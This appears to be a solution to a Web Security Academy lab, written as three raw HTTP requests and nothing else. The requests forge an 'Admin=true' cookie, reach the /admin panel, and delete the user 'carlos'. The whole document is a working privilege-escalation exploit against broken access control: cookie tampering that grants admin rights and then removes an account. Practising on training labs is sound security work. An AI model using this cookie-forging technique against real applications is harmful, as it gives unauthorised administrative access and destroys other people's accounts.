// 1
GET / HTTP/1.1
Host: acca1ff31eae68ae809a04f5002f002e.web-security-academy.net
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: https://acca1ff31eae68ae809a04f5002f002e.web-security-academy.net/login
Connection: close
Cookie: session=muQawWDu4INynsrzksyzkCDTqtOS9H2r; Admin=true
Upgrade-Insecure-Requests: 1

// 2
GET /admin HTTP/1.1
Host: acca1ff31eae68ae809a04f5002f002e.web-security-academy.net
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: https://acca1ff31eae68ae809a04f5002f002e.web-security-academy.net/login
Connection: close
Cookie: session=muQawWDu4INynsrzksyzkCDTqtOS9H2r; Admin=true
Upgrade-Insecure-Requests: 1

// 3
GET /admin/delete?username=carlos HTTP/1.1
Host: acca1ff31eae68ae809a04f5002f002e.web-security-academy.net
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: https://acca1ff31eae68ae809a04f5002f002e.web-security-academy.net/login
Connection: close
Cookie: session=muQawWDu4INynsrzksyzkCDTqtOS9H2r; Admin=true
Upgrade-Insecure-Requests: 1
